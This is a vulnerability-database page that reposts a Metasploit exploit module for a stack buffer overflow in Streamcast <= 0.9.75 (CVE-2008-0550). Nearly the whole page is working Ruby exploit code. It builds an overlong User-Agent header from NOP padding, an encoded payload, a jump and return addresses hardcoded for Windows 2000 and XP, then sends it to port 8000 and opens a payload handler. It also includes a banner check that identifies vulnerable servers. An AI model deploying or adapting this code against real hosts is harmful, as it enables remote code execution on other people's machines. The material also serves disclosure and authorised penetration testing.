Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Streamcast HTTP User-Agent Buffer Overflo


                                                ##
# $Id: steamcast_useragent.rb 9488 2010-06-11 16:12:05Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Streamcast &#60;= 0.9.75 HTTP User-Agent Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in Streamcast &#60;= 0.9.75. By sending
					an overly long User-Agent in an HTTP GET request, an attacker may be able to
					execute arbitrary code.
			},
			&#39;Author&#39;         =&#62; 	[
								&#39;LSO &#60;lso[@]hushmail.com&#62;&#39;, # Original exploit module
								&#39;patrick&#39; # Added references and check code. Default target to XP.
							],
			&#39;License&#39;        =&#62; BSD_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9488 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2008-0550&#39; ],
					[ &#39;OSVDB&#39;, &#39;42670&#39; ],
					[ &#39;URL&#39;, &#39;http://aluigi.altervista.org/adv/steamcazz-adv.txt&#39;],
					# [ &#39;BID&#39;, &#39;&#39; ], # No entry as yet
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;thread&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 750,
					&#39;BadChars&#39; =&#62; &#34;\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
					&#39;EncoderType&#39;   =&#62; Msf::Encoder::Type::AlphanumUpper,
					&#39;DisableNops&#39;  =&#62;  &#39;True&#39;,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					# Tested OK by patrick 20090225
					[ &#39;Windows 2000 Pro English All&#39;, { &#39;Ret&#39; =&#62; 0x75022ac4 } ],
					[ &#39;Windows XP Pro SP0/SP1 English&#39;, { &#39;Ret&#39; =&#62; 0x71aa32ad } ],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Jan 24 2008&#39;,
			&#39;DefaultTarget&#39; =&#62; 1))

			register_options([ Opt::RPORT(8000) ], self)
	end

	def check
		connect
		sock.put(&#34;GET / HTTP/1.0\r\n\r\n&#34;)
		res = sock.get(-1, 3)
		disconnect

		if (res =~ /Steamcast\/0.9.75/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		juju =  &#34;GET / HTTP/1.0\r\n&#34;
		juju &#60;&#60; &#34;User-Agent: &#34; + make_nops(1008 - payload.encoded.length)
		juju &#60;&#60; payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
		juju &#60;&#60; [ target.ret ].pack(&#39;V&#39;) + [0xe8, -850].pack(&#39;CV&#39;)
		juju &#60;&#60;  rand_text_alpha_upper(275)

		print_status(&#34;Trying target #{target.name}...&#34;)
		sock.put(juju + &#34;\r\n\r\n&#34;)

		handler
		disconnect
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1